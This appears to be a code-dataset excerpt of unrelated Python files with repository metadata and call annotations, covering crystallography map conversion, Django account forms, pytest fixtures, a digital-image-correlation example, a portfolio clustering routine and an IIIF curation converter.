self.Logfile.insert('converting ccp4 map to mtz with phenix.map_to_structure_factors: %s' %emap)
if os.path.isfile(emap.replace('.ccp4','.mtz')):
self.Logfile.warning('mtz file of event map exists; skipping...')
return
cmd = ( 'module load phenix\n'
'phenix.map_to_structure_factors %s d_min=%s\n' %(emap,reso)+
'/bin/mv map_to_structure_factors.mtz %s' %emap.replace('.ccp4', '.mtz') )
os.system(cmd)
def get_lig_cc(self,mtz,lig):
self.Logfile.insert('calculating CC for %s in %s' %(lig,mtz))
if os.path.isfile(mtz.replace('.mtz', '_CC.log')):
self.Logfile.warning('logfile of CC analysis exists; skipping...')
return
cmd = ( 'module load phenix\n'
'phenix.get_cc_mtz_pdb %s %s > %s' % (mtz, lig, mtz.replace('.mtz', '_CC.log')) )
os.system(cmd)
def check_lig_cc(self,log):
cc = 'n/a'
if os.path.isfile(log):
for line in open(log):
if line.startswith('local'):
cc = line.split()[len(line.split()) - 1]
else:
self.Logfile.error('logfile does not exist: %s' %log)
return cc
def convert_map_to_sf_with_gemmi(self,emap,p):
self.Logfile.insert('converting ccp4 map to mtz with gemmi map2sf: %s' %emap)
if os.path.isfile(emap.replace('.ccp4','.mtz')):
self.Logfile.warning('mtz file of event map exists; skipping...')
return
cmd = 'gemmi map2sf %s %s FWT PHWT --dmin=%s' %(emap,emap.replace('.ccp4','.mtz'),p.resolution)
self.Logfile.insert('converting map with command:\n' + cmd)
os.system(cmd) | [] |
OMAR-EHAB777/FerpMenu | OmegaErp/Apps/base/forms/__init__.py | 6aee4616bc9bc7801023fe51acfa28e1e1267b66 | # -*- coding: utf-8 -*-
"""
Global app forms
"""
# Standard Library
import re
# Django Library
from django import forms
from django.contrib.auth.forms import UserChangeForm, UserCreationForm
from django.utils.translation import ugettext_lazy as _
# Thirdparty Library
from dal import autocomplete
# Localfolder Library
from ..models import PyCompany, PyCountry, PyUser
from .partner import PartnerForm
class PerfilForm(forms.ModelForm):
"""Class to update the user profile on the system
"""
class Meta:
model = PyUser
fields = (
'first_name',
'last_name',
'celular',
)
labels = {
'first_name': _('Name'),
'last_name': _('Last Name'),
'celular': _('Mobile Phone'),
}
widgets = {
'first_name': forms.TextInput(attrs={'class': 'form-control'}),
'last_name': forms.TextInput(attrs={'class': 'form-control'}),
'celular': forms.TextInput(attrs={'class': 'form-control'}),
}
class PersonaChangeForm(UserChangeForm):
"""for something will be
"""
class Meta(UserChangeForm.Meta):
model = PyUser
fields = (
'email',
'is_superuser',
'is_staff',
'is_active',
'last_login',
'date_joined',
'first_name',
'last_name',
)
# ========================================================================== #
class PasswordRecoveryForm(forms.ModelForm):
"""To send the account recovery correction
"""
class Meta():
model = PyUser
fields = (
'email',
)
widgets = {
'email': forms.EmailInput(
attrs={'class': 'form-control', 'placeholder': _('Email')}
),
}
# ========================================================================== #
class PasswordSetForm(forms.Form):
"""To send the account recovery correction
"""
password1 = forms.CharField(
widget=forms.PasswordInput(
attrs={'class': 'form-control', 'placeholder': _('Password')}
)
)
password2 = forms.CharField(
widget=forms.PasswordInput(
attrs={'class': 'form-control', 'placeholder': _('Retype password')}
)
)
def clean(self):
super().clean()
password1 = self.cleaned_data.get('password1')
password2 = self.cleaned_data.get('password2')
print('entre8888')
if password1 != password2:
raise forms.ValidationError(
_('The two password fields didn\'t match.')
)
if password1 != password2:
raise forms.ValidationError(
_('The two password fields didn\'t match.')
)
class PersonaCreationForm(UserCreationForm):
"""This form class renders the record sheet of
users
"""
class Meta(UserCreationForm.Meta):
model = PyUser
fields = (
'email',
)
widgets = {
'email': forms.EmailInput(
attrs={'class': 'form-control', 'placeholder': _('Email')}
),
}
class AvatarForm(forms.ModelForm):
"""Class to update the user profile on the system
"""
class Meta:
model = PyUser
fields = (
'avatar',
)
class InitForm(forms.ModelForm):
"""From of OMegaERP initializacion
"""
email = forms.EmailField(
widget=forms.EmailInput(
attrs={
'placeholder': _('Admin email')
}
)
)
password = forms.CharField(
max_length=100,
widget=forms.PasswordInput(
attrs={
'placeholder': _('Admin Password')
}
)
)
class Meta:
model = PyCompany
fields = [
'name',
'country',
'email',
'password'
]
labels = {
'name': _('Company Name'),
'country': _('Country'),
'email': _('Admin user email'),
'password': _('Password'),
}
widgets = {
'name': forms.TextInput(
attrs={
'class': 'form-control',
'data-placeholder': _('Company Name'),
'style': 'width: 100%',
},
),
'country': autocomplete.ModelSelect2(
url='PyCountry:autocomplete',
attrs={
'class': 'form-control',
'data-placeholder': _('Select a country...'),
'style': 'width: 100%',
},
),
'email': forms.EmailInput(
attrs={
'class': 'form-control',
'data-placeholder': _('Admin user email'),
'style': 'width: 100%',
},
),
}
class ActivateForm(forms.Form):
"""To activate or deactivate an object in OmegaERP
"""
object_name = forms.CharField(max_length=100, widget=forms.HiddenInput)
object_pk = forms.IntegerField(widget=forms.HiddenInput) | [((194, 18, 194, 75), 'django.forms.CharField', 'forms.CharField', (), '', False, 'from django import forms\n'), ((195, 16, 195, 60), 'django.forms.IntegerField', 'forms.IntegerField', (), '', False, 'from django import forms\n'), ((32, 26, 32, 35), 'django.utils.translation.ugettext_lazy', '_', ({(32, 28, 32, 34): '"""Name"""'}, {}), "('Name')", True, 'from django.utils.translation import ugettext_lazy as _\n'), ((33, 25, 33, 39), 'django.utils.translation.ugettext_lazy', '_', ({(33, 27, 33, 38): '"""Last Name"""'}, {}), "('Last Name')", True, 'from django.utils.translation import ugettext_lazy as _\n'), ((34, 23, 34, 40), 'django.utils.translation.ugettext_lazy', '_', ({(34, 25, 34, 39): '"""Mobile Phone"""'}, {}), "('Mobile Phone')", True, 'from django.utils.translation import ugettext_lazy as _\n'), ((37, 26, 37, 74), 'django.forms.TextInput', 'forms.TextInput', (), '', False, 'from django import forms\n'), ((38, 25, 38, 73), 'django.forms.TextInput', 'forms.TextInput', (), '', False, 'from django import forms\n'), ((39, 23, 39, 71), 'django.forms.TextInput', 'forms.TextInput', (), '', False, 'from django import forms\n'), ((160, 20, 160, 37), 'django.utils.translation.ugettext_lazy', '_', ({(160, 22, 160, 36): '"""Company Name"""'}, {}), "('Company Name')", True, 'from django.utils.translation import ugettext_lazy as _\n'), ((161, 23, 161, 35), 'django.utils.translation.ugettext_lazy', '_', ({(161, 25, 161, 34): '"""Country"""'}, {}), "('Country')", True, 'from django.utils.translation import ugettext_lazy as _\n'), ((162, 21, 162, 42), 'django.utils.translation.ugettext_lazy', '_', ({(162, 23, 162, 41): '"""Admin user email"""'}, {}), "('Admin user email')", True, 'from django.utils.translation import ugettext_lazy as _\n'), ((163, 24, 163, 37), 'django.utils.translation.ugettext_lazy', '_', ({(163, 26, 163, 36): '"""Password"""'}, {}), "('Password')", True, 'from django.utils.translation import ugettext_lazy as _\n'), ((98, 16, 98, 59), 'django.utils.translation.ugettext_lazy', '_', ({(98, 18, 98, 58): '"""The two password fields didn\'t match."""'}, {}), '("The two password fields didn\'t match.")', True, 'from django.utils.translation import ugettext_lazy as _\n'), ((102, 16, 102, 59), 'django.utils.translation.ugettext_lazy', '_', ({(102, 18, 102, 58): '"""The two password fields didn\'t match."""'}, {}), '("The two password fields didn\'t match.")', True, 'from django.utils.translation import ugettext_lazy as _\n'), ((71, 63, 71, 73), 'django.utils.translation.ugettext_lazy', '_', ({(71, 65, 71, 72): '"""Email"""'}, {}), "('Email')", True, 'from django.utils.translation import ugettext_lazy as _\n'), ((82, 59, 82, 72), 'django.utils.translation.ugettext_lazy', '_', ({(82, 61, 82, 71): '"""Password"""'}, {}), "('Password')", True, 'from django.utils.translation import ugettext_lazy as _\n'), ((87, 59, 87, 79), 'django.utils.translation.ugettext_lazy', '_', ({(87, 61, 87, 78): '"""Retype password"""'}, {}), "('Retype password')", True, 'from django.utils.translation import ugettext_lazy as _\n'), ((117, 63, 117, 73), 'django.utils.translation.ugettext_lazy', '_', ({(117, 65, 117, 72): '"""Email"""'}, {}), "('Email')", True, 'from django.utils.translation import ugettext_lazy as _\n'), ((138, 31, 138, 47), 'django.utils.translation.ugettext_lazy', '_', ({(138, 33, 138, 46): '"""Admin email"""'}, {}), "('Admin email')", True, 'from django.utils.translation import ugettext_lazy as _\n'), ((146, 31, 146, 50), 'django.utils.translation.ugettext_lazy', '_', ({(146, 33, 146, 49): '"""Admin Password"""'}, {}), "('Admin Password')", True, 'from django.utils.translation import ugettext_lazy as _\n'), ((169, 40, 169, 57), 'django.utils.translation.ugettext_lazy', '_', ({(169, 42, 169, 56): '"""Company Name"""'}, {}), "('Company Name')", True, 'from django.utils.translation import ugettext_lazy as _\n'), ((177, 40, 177, 64), 'django.utils.translation.ugettext_lazy', '_', ({(177, 42, 177, 63): '"""Select a country..."""'}, {}), "('Select a country...')", True, 'from django.utils.translation import ugettext_lazy as _\n'), ((184, 40, 184, 61), 'django.utils.translation.ugettext_lazy', '_', ({(184, 42, 184, 60): '"""Admin user email"""'}, {}), "('Admin user email')", True, 'from django.utils.translation import ugettext_lazy as _\n')] |
fvlima/drf-view-profiler | test-drf-project/tests/conftest.py | a61d48e9835679f812d69d24ea740b947836108c | from unittest import mock
import pytest
from django.http import HttpRequest
from rest_framework.response import Response
from rest_framework.test import APIClient
from drf_viewset_profiler.middleware import LineProfilerViewSetMiddleware
@pytest.fixture
def api_client():
return APIClient()
@pytest.fixture
def mock_http_request():
http_request = HttpRequest()
http_request.method = "GET"
return http_request
@pytest.fixture
def mock_http_response(mock_http_request):
response = Response()
mock_http_request.line_profiler = mock.Mock()
mock_http_request.parser_context = {"view": mock.Mock()}
response.renderer_context = {"request": mock_http_request}
return response
@pytest.fixture
def mock_output_writer(monkeypatch):
mock_output_writer_ = mock.Mock()
monkeypatch.setattr("drf_viewset_profiler.middleware.output_writer.stream", mock_output_writer_)
return mock_output_writer_
@pytest.fixture
def mock_line_profiler_viewset_middleware():
return LineProfilerViewSetMiddleware()
| [((13, 11, 13, 22), 'rest_framework.test.APIClient', 'APIClient', ({}, {}), '()', False, 'from rest_framework.test import APIClient\n'), ((18, 19, 18, 32), 'django.http.HttpRequest', 'HttpRequest', ({}, {}), '()', False, 'from django.http import HttpRequest\n'), ((25, 15, 25, 25), 'rest_framework.response.Response', 'Response', ({}, {}), '()', False, 'from rest_framework.response import Response\n'), ((26, 38, 26, 49), 'unittest.mock.Mock', 'mock.Mock', ({}, {}), '()', False, 'from unittest import mock\n'), ((34, 26, 34, 37), 'unittest.mock.Mock', 'mock.Mock', ({}, {}), '()', False, 'from unittest import mock\n'), ((41, 11, 41, 42), 'drf_viewset_profiler.middleware.LineProfilerViewSetMiddleware', 'LineProfilerViewSetMiddleware', ({}, {}), '()', False, 'from drf_viewset_profiler.middleware import LineProfilerViewSetMiddleware\n'), ((27, 48, 27, 59), 'unittest.mock.Mock', 'mock.Mock', ({}, {}), '()', False, 'from unittest import mock\n')] |
diehlpk/muDIC | Examples/VirtualLab/virtual_experiment_f.py | b5d90aa62267b4bd0b88ae0a989cf09a51990654 | # This allows for running the example when the repo has been cloned
import sys
from os.path import abspath
sys.path.extend([abspath(".")])
# Example code follows
import logging
import numpy as np
import matplotlib.pyplot as plt
import muDIC.vlab as vlab
import muDIC as dic
"""
This example case runs an experiment where a deformation gradient is used
to deform a synthetically generated speckle, the speckle is then down sampled by a factor of four
and sensor artifacts are included.
The analysis is then performed and the resulting deformation gradient field is compared to the
one used to deform the images
"""
# Set the amount of info printed to terminal during analysis
logging.basicConfig(format='%(name)s:%(levelname)s:%(message)s', level=logging.INFO)
show_results = False
# Define the image you want to analyse
n_imgs = 2
image_shape = (500, 500)
downsample_factor = 4
super_image_shape = tuple(dim * downsample_factor for dim in image_shape)
# Make a speckle image
speckle_image = vlab.rosta_speckle(super_image_shape, dot_size=4, density=0.5, smoothness=2.0)
# Make an image deformed
F = np.array([[1.01,0],[0.01,1.0]])
image_deformer = vlab.imageDeformer_from_defGrad(F)
# Make an image down-sampler including downscaling, fill-factor and sensor grid irregularities
downsampler = vlab.Downsampler(image_shape=super_image_shape, factor=downsample_factor, fill=.95,
pixel_offset_stddev=0.05)
# Make a noise injector producing 2% gaussian additive noise
noise_injector = vlab.noise_injector("gaussian", sigma=.02)
# Make an synthetic image generation pipeline
image_generator = vlab.SyntheticImageGenerator(speckle_image=speckle_image, image_deformer=image_deformer,
downsampler=downsampler, noise_injector=noise_injector, n=n_imgs)
# Put it into an image stack
image_stack = dic.ImageStack(image_generator)
# Now, make a mesh. Make sure to use enough elements
mesher = dic.Mesher(deg_n=3, deg_e=3,type="spline")
#mesh = mesher.mesh(image_stack) # Use this if you want to use a GUI
mesh = mesher.mesh(image_stack,Xc1=50,Xc2=450,Yc1=50,Yc2=450,n_ely=8,n_elx=8, GUI=False)
# Prepare the analysis input and initiate the analysis
input = dic.DICInput(mesh, image_stack)
input.tol = 1e-6
input.interpolation_order = 4
dic_job = dic.DICAnalysis(input)
results = dic_job.run()
# Calculate the fields for later use. Seed is used when spline elements are used and upscale is used for Q4.
fields = dic.Fields(results, seed=101,upscale=10)
# We will now compare the results from the analysis to the deformation gradient which the image was deformed by
if show_results:
plt.figure()
plt.imshow(F[0,0] - fields.F()[0, 0,0, :, :, 1], cmap=plt.cm.magma)
plt.xlabel("Element e-coordinate")
plt.ylabel("Element n-coordinate")
plt.colorbar()
plt.title("Difference in deformation gradient component 0,0 within the element")
fig1 = plt.figure()
ax1 = fig1.add_subplot(111)
#line1 = ax1.plot(res_field[:, 50], label="correct")
line2 = ax1.plot(fields.F()[0, 0,0, :, 50, 1], label="DIC")
ax1.set_xlabel("element e-coordinate")
ax1.set_ylabel("Deformation gradient component 0,0 []")
ax2 = fig1.add_subplot(111, sharex=ax1, frameon=False)
line3 = ax2.plot(F[0,0] - fields.F()[0, 0,0, :, 50, 1], "r--", label="difference")
ax2.yaxis.tick_right()
ax2.yaxis.set_label_position("right")
ax2.set_ylabel("Deviation []")
plt.title("Deformation gradient component 0,0")
fig1.legend()
plt.show()
| [((23, 0, 23, 84), 'logging.basicConfig', 'logging.basicConfig', (), '', False, 'import logging\n'), ((34, 16, 34, 94), 'muDIC.vlab.rosta_speckle', 'vlab.rosta_speckle', (), '', True, 'import muDIC.vlab as vlab\n'), ((38, 4, 38, 35), 'numpy.array', 'np.array', ({(38, 13, 38, 34): '[[1.01, 0], [0.01, 1.0]]'}, {}), '([[1.01, 0], [0.01, 1.0]])', True, 'import numpy as np\n'), ((39, 17, 39, 51), 'muDIC.vlab.imageDeformer_from_defGrad', 'vlab.imageDeformer_from_defGrad', ({(39, 49, 39, 50): 'F'}, {}), '(F)', True, 'import muDIC.vlab as vlab\n'), ((42, 14, 43, 56), 'muDIC.vlab.Downsampler', 'vlab.Downsampler', (), '', True, 'import muDIC.vlab as vlab\n'), ((46, 17, 46, 59), 'muDIC.vlab.noise_injector', 'vlab.noise_injector', (), '', True, 'import muDIC.vlab as vlab\n'), ((49, 18, 50, 112), 'muDIC.vlab.SyntheticImageGenerator', 'vlab.SyntheticImageGenerator', (), '', True, 'import muDIC.vlab as vlab\n'), ((52, 14, 52, 45), 'muDIC.ImageStack', 'dic.ImageStack', ({(52, 29, 52, 44): 'image_generator'}, {}), '(image_generator)', True, 'import muDIC as dic\n'), ((55, 9, 55, 51), 'muDIC.Mesher', 'dic.Mesher', (), '', True, 'import muDIC as dic\n'), ((61, 8, 61, 39), 'muDIC.DICInput', 'dic.DICInput', ({(61, 21, 61, 25): 'mesh', (61, 27, 61, 38): 'image_stack'}, {}), '(mesh, image_stack)', True, 'import muDIC as dic\n'), ((65, 10, 65, 32), 'muDIC.DICAnalysis', 'dic.DICAnalysis', ({(65, 26, 65, 31): 'input'}, {}), '(input)', True, 'import muDIC as dic\n'), ((69, 9, 69, 49), 'muDIC.Fields', 'dic.Fields', (), '', True, 'import muDIC as dic\n'), ((74, 4, 74, 16), 'matplotlib.pyplot.figure', 'plt.figure', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((76, 4, 76, 38), 'matplotlib.pyplot.xlabel', 'plt.xlabel', ({(76, 15, 76, 37): '"""Element e-coordinate"""'}, {}), "('Element e-coordinate')", True, 'import matplotlib.pyplot as plt\n'), ((77, 4, 77, 38), 'matplotlib.pyplot.ylabel', 'plt.ylabel', ({(77, 15, 77, 37): '"""Element n-coordinate"""'}, {}), "('Element n-coordinate')", True, 'import matplotlib.pyplot as plt\n'), ((78, 4, 78, 18), 'matplotlib.pyplot.colorbar', 'plt.colorbar', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((79, 4, 79, 84), 'matplotlib.pyplot.title', 'plt.title', ({(79, 14, 79, 83): '"""Difference in deformation gradient component 0,0 within the element"""'}, {}), "('Difference in deformation gradient component 0,0 within the element'\n )", True, 'import matplotlib.pyplot as plt\n'), ((81, 11, 81, 23), 'matplotlib.pyplot.figure', 'plt.figure', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((93, 4, 93, 51), 'matplotlib.pyplot.title', 'plt.title', ({(93, 14, 93, 50): '"""Deformation gradient component 0,0"""'}, {}), "('Deformation gradient component 0,0')", True, 'import matplotlib.pyplot as plt\n'), ((96, 4, 96, 14), 'matplotlib.pyplot.show', 'plt.show', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((4, 17, 4, 29), 'os.path.abspath', 'abspath', ({(4, 25, 4, 28): '"""."""'}, {}), "('.')", False, 'from os.path import abspath\n')] |
ckaestne/toxicity-detector | src/template_config.py | bb00ffe4470c6c1a2f561212d487d56eab5a5da7 | mongo = { "user": "", "passwd": "", "db": "ghtorrent" }
perspective_api_key = ""
| [] |
COEJKnight/one | tests/unit/dataactvalidator/test_fabs38_detached_award_financial_assistance_2.py | 6a5f8cd9468ab368019eb2597821b7837f74d9e2 | from tests.unit.dataactcore.factories.staging import DetachedAwardFinancialAssistanceFactory
from tests.unit.dataactvalidator.utils import number_of_errors, query_columns
_FILE = 'fabs38_detached_award_financial_assistance_2'
def test_column_headers(database):
expected_subset = {"row_number", "awarding_office_code"}
actual = set(query_columns(_FILE, database))
assert expected_subset == actual
def test_success(database):
""" AwardingOfficeCode must be six characters long. """
det_award_1 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='AAAAAA')
det_award_2 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='111111')
det_award_3 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='AAA111')
det_award_4 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='')
det_award_5 = DetachedAwardFinancialAssistanceFactory(awarding_office_code=None)
errors = number_of_errors(_FILE, database, models=[det_award_1, det_award_2, det_award_3, det_award_4, det_award_5])
assert errors == 0
def test_failure(database):
""" AwardingOfficeCode must be six characters long. """
det_award_1 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='AAAA1')
det_award_2 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='AAAAAAA')
errors = number_of_errors(_FILE, database, models=[det_award_1, det_award_2])
assert errors == 2
| [((16, 18, 16, 88), 'tests.unit.dataactcore.factories.staging.DetachedAwardFinancialAssistanceFactory', 'DetachedAwardFinancialAssistanceFactory', (), '', False, 'from tests.unit.dataactcore.factories.staging import DetachedAwardFinancialAssistanceFactory\n'), ((17, 18, 17, 88), 'tests.unit.dataactcore.factories.staging.DetachedAwardFinancialAssistanceFactory', 'DetachedAwardFinancialAssistanceFactory', (), '', False, 'from tests.unit.dataactcore.factories.staging import DetachedAwardFinancialAssistanceFactory\n'), ((18, 18, 18, 88), 'tests.unit.dataactcore.factories.staging.DetachedAwardFinancialAssistanceFactory', 'DetachedAwardFinancialAssistanceFactory', (), '', False, 'from tests.unit.dataactcore.factories.staging import DetachedAwardFinancialAssistanceFactory\n'), ((19, 18, 19, 82), 'tests.unit.dataactcore.factories.staging.DetachedAwardFinancialAssistanceFactory', 'DetachedAwardFinancialAssistanceFactory', (), '', False, 'from tests.unit.dataactcore.factories.staging import DetachedAwardFinancialAssistanceFactory\n'), ((20, 18, 20, 84), 'tests.unit.dataactcore.factories.staging.DetachedAwardFinancialAssistanceFactory', 'DetachedAwardFinancialAssistanceFactory', (), '', False, 'from tests.unit.dataactcore.factories.staging import DetachedAwardFinancialAssistanceFactory\n'), ((21, 13, 21, 120), 'tests.unit.dataactvalidator.utils.number_of_errors', 'number_of_errors', (), '', False, 'from tests.unit.dataactvalidator.utils import number_of_errors, query_columns\n'), ((28, 18, 28, 87), 'tests.unit.dataactcore.factories.staging.DetachedAwardFinancialAssistanceFactory', 'DetachedAwardFinancialAssistanceFactory', (), '', False, 'from tests.unit.dataactcore.factories.staging import DetachedAwardFinancialAssistanceFactory\n'), ((29, 18, 29, 89), 'tests.unit.dataactcore.factories.staging.DetachedAwardFinancialAssistanceFactory', 'DetachedAwardFinancialAssistanceFactory', (), '', False, 'from tests.unit.dataactcore.factories.staging import DetachedAwardFinancialAssistanceFactory\n'), ((30, 13, 30, 81), 'tests.unit.dataactvalidator.utils.number_of_errors', 'number_of_errors', (), '', False, 'from tests.unit.dataactvalidator.utils import number_of_errors, query_columns\n'), ((9, 17, 9, 47), 'tests.unit.dataactvalidator.utils.query_columns', 'query_columns', ({(9, 31, 9, 36): '_FILE', (9, 38, 9, 46): 'database'}, {}), '(_FILE, database)', False, 'from tests.unit.dataactvalidator.utils import number_of_errors, query_columns\n')] |
BrandonAFong/Ideas | Optimisation Portfolios/HERC.py | 5d38be2dfaba12a534220e3f28a6c9da9aefcdec | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Aug 31 22:48:21 2021
@author: apple
"""
import numpy as np
import pandas as pd
from HRP import seriation
import fastcluster
from scipy.cluster.hierarchy import fcluster
from gap_statistic import OptimalK
from backtest import df_to_matrix
#HERC
def intersection(list1, list2):
intersec = [set(list1) & set(list2)]
return intersec
def compute_allocation(covar, clusters,Z,dimensions):
numClusters = len(clusters)
aWeights = np.array([1.] * len(covar))
cWeights = np.array([1.] * numClusters)
cVar = np.array([0.] * numClusters)
for i, cluster in clusters.items():
cluster_covar = covar[cluster, :][:, cluster]
inv_diag = 1 / np.diag(cluster_covar)
aWeights[cluster] = inv_diag / np.sum(inv_diag)
for i, cluster in clusters.items():
weights = aWeights[cluster]
cVar[i - 1] = np.dot(
weights, np.dot(covar[cluster, :][:, cluster], weights))
for m in range(numClusters - 1):
left = int(Z[dimensions - 2 - m, 0])
lc = seriation(Z, dimensions, left)
right = int(Z[dimensions - 2 - m, 1])
rc = seriation(Z, dimensions, right)
id_lc = []
id_rc = []
for i, cluster in clusters.items():
if sorted(intersection(lc, cluster)) == sorted(cluster):
id_lc.append(i)
if sorted(intersection(rc, cluster)) == sorted(cluster):
id_rc.append(i)
id_lc = np.array(id_lc) - 1
id_rc = np.array(id_rc) - 1
alpha = 0
lcVar = np.sum(cVar[id_lc])
rcVar = np.sum(cVar[id_rc])
alpha = lcVar / (lcVar + rcVar)
cWeights[id_lc] = cWeights[
id_lc] * alpha
cWeights[id_rc] = cWeights[
id_rc] * (1 - alpha)
for i, cluster in clusters.items():
aWeights[cluster] = aWeights[cluster] * cWeights[
i - 1]
return aWeights
#Dataframe of returns
def HERC(mat_ret):
#Need to first calculate the optimal number of clusters
#The mat_ret that goes into this must be a np array of returns
# correl_mat = mat_ret.corr(method='pearson')
column_dic = {k:v for v, k in enumerate(mat_ret.columns)}
correl_mat = df_to_matrix(mat_ret.corr(method='pearson'))
dist = 1 - correl_mat
dim = len(dist)
tri_a, tri_b = np.triu_indices(dim, k = 1)
Z = fastcluster.linkage(dist[tri_a, tri_b], method='ward')
optimalK = OptimalK(parallel_backend = 'rust')
n_clusters = optimalK(mat_ret.values, cluster_array = np.arange(1,len(mat_ret)))
nb_clusters = n_clusters
clustering_inds = fcluster(Z, nb_clusters, criterion='maxclust')
clusters = {i: [] for i in range(min(clustering_inds),max(clustering_inds) + 1)}
for i, v in enumerate(clustering_inds):
clusters[v].append(i)
HERC_w = compute_allocation(correl_mat, clusters, Z, dim)
HERC_w = pd.Series(HERC_w)
my_inverted_dict = dict(map(reversed, column_dic.items()))
HERC_w = HERC_w.rename(index = my_inverted_dict)
return HERC_w
| [((30, 15, 30, 43), 'numpy.array', 'np.array', ({(30, 24, 30, 42): '[1.0] * numClusters'}, {}), '([1.0] * numClusters)', True, 'import numpy as np\n'), ((31, 11, 31, 39), 'numpy.array', 'np.array', ({(31, 20, 31, 38): '[0.0] * numClusters'}, {}), '([0.0] * numClusters)', True, 'import numpy as np\n'), ((91, 19, 91, 46), 'numpy.triu_indices', 'np.triu_indices', (), '', True, 'import numpy as np\n'), ((95, 8, 95, 62), 'fastcluster.linkage', 'fastcluster.linkage', (), '', False, 'import fastcluster\n'), ((97, 15, 97, 50), 'gap_statistic.OptimalK', 'OptimalK', (), '', False, 'from gap_statistic import OptimalK\n'), ((101, 22, 101, 68), 'scipy.cluster.hierarchy.fcluster', 'fcluster', (), '', False, 'from scipy.cluster.hierarchy import fcluster\n'), ((107, 13, 107, 30), 'pandas.Series', 'pd.Series', ({(107, 23, 107, 29): 'HERC_w'}, {}), '(HERC_w)', True, 'import pandas as pd\n'), ((45, 13, 45, 43), 'HRP.seriation', 'seriation', ({(45, 23, 45, 24): 'Z', (45, 26, 45, 36): 'dimensions', (45, 38, 45, 42): 'left'}, {}), '(Z, dimensions, left)', False, 'from HRP import seriation\n'), ((48, 13, 48, 44), 'HRP.seriation', 'seriation', ({(48, 23, 48, 24): 'Z', (48, 26, 48, 36): 'dimensions', (48, 38, 48, 43): 'right'}, {}), '(Z, dimensions, right)', False, 'from HRP import seriation\n'), ((65, 16, 65, 35), 'numpy.sum', 'np.sum', ({(65, 23, 65, 34): 'cVar[id_lc]'}, {}), '(cVar[id_lc])', True, 'import numpy as np\n'), ((66, 16, 66, 35), 'numpy.sum', 'np.sum', ({(66, 23, 66, 34): 'cVar[id_rc]'}, {}), '(cVar[id_rc])', True, 'import numpy as np\n'), ((35, 23, 35, 45), 'numpy.diag', 'np.diag', ({(35, 31, 35, 44): 'cluster_covar'}, {}), '(cluster_covar)', True, 'import numpy as np\n'), ((36, 39, 36, 55), 'numpy.sum', 'np.sum', ({(36, 46, 36, 54): 'inv_diag'}, {}), '(inv_diag)', True, 'import numpy as np\n'), ((41, 21, 41, 67), 'numpy.dot', 'np.dot', ({(41, 28, 41, 57): 'covar[(cluster), :][:, (cluster)]', (41, 59, 41, 66): 'weights'}, {}), '(covar[(cluster), :][:, (cluster)], weights)', True, 'import numpy as np\n'), ((61, 16, 61, 31), 'numpy.array', 'np.array', ({(61, 25, 61, 30): 'id_lc'}, {}), '(id_lc)', True, 'import numpy as np\n'), ((62, 16, 62, 31), 'numpy.array', 'np.array', ({(62, 25, 62, 30): 'id_rc'}, {}), '(id_rc)', True, 'import numpy as np\n')] |
nakamura196/i3 | src/conv/convertManifest2Curation.py | 16d7695e5412b45dc8e0192d9ca285723ac9f788 | import urllib.request
from bs4 import BeautifulSoup
import csv
import requests
import os
import json
import time
import glob
files = glob.glob("/Users/nakamura/git/d_iiif/iiif/src/collections/nijl/data/json/*.json")
for i in range(len(files)):
file = files[i]
file_id = file.split("/")[-1].replace(".json", "")
opath = "/Users/nakamura/git/d_iiif/iiif/src/collections/nijl/data/curation/"+file_id+".json"
if not os.path.exists(opath):
fw = open(opath, 'w')
curation_data = {}
curation_uri = "curation:"+file_id+".json"
with open(file) as f:
try:
df = json.load(f)
except:
continue
anno_count = 1
if "sequences" in df:
print(file)
members = []
canvases = df["sequences"][0]["canvases"]
for j in range(len(canvases)):
canvas = canvases[j]
if "otherContent" in canvas:
id = canvas["otherContent"][0]["@id"]
headers = {"content-type": "application/json"}
# time.sleep(0.5)
r = requests.get(id, headers=headers)
data = r.json()
print(id)
resources = data["resources"]
for resource in resources:
member_id = resource["on"]
res = resource["resource"]
chars = res["chars"]
member = {
"@id": member_id,
"@type": "sc:Canvas",
"label": "[Annotation " + str(anno_count) + "]",
"description": chars,
"metadata": [
{
"label": res["@type"],
"value": chars
}
]
}
anno_count += 1
members.append(member)
if len(members) > 0:
label = ""
if "label" in df:
label = df["label"]
curation_data = {
"@context": [
"http://iiif.io/api/presentation/2/context.json",
"http://codh.rois.ac.jp/iiif/curation/1/context.json"
],
"@type": "cr:Curation",
"@id": curation_uri,
"label": "Automatic curation by IIIF Converter",
"selections": [
{
"@id": curation_uri + "/range1",
"@type": "sc:Range",
"label": "Automatic curation by IIIF Converter",
"members": members,
"within": {
"@id": df["@id"],
"@type": "sc:Manifest",
"label": label
}
}
]
}
json.dump(curation_data, fw, ensure_ascii=False, indent=4, sort_keys=True, separators=(',', ': '))
| [((10, 8, 10, 90), 'glob.glob', 'glob.glob', ({(10, 18, 10, 89): '"""/Users/nakamura/git/d_iiif/iiif/src/collections/nijl/data/json/*.json"""'}, {}), "(\n '/Users/nakamura/git/d_iiif/iiif/src/collections/nijl/data/json/*.json')", False, 'import glob\n'), ((20, 11, 20, 32), 'os.path.exists', 'os.path.exists', ({(20, 26, 20, 31): 'opath'}, {}), '(opath)', False, 'import os\n'), ((111, 8, 111, 106), 'json.dump', 'json.dump', (), '', False, 'import json\n'), ((29, 21, 29, 33), 'json.load', 'json.load', ({(29, 31, 29, 32): 'f'}, {}), '(f)', False, 'import json\n'), ((51, 28, 51, 61), 'requests.get', 'requests.get', (), '', False, 'import requests\n')] |
GaLaXy102/Vacationing | programme.py | e476f1047deeca8f68897a497716319afab3e7f0 | from lib import get_itineraries
import data
if __name__ == '__main__':
for itinerary in get_itineraries(data.sicily):
print("#" * 24)
print(itinerary)
print("")
| [((5, 21, 5, 49), 'lib.get_itineraries', 'get_itineraries', ({(5, 37, 5, 48): 'data.sicily'}, {}), '(data.sicily)', False, 'from lib import get_itineraries\n')] |
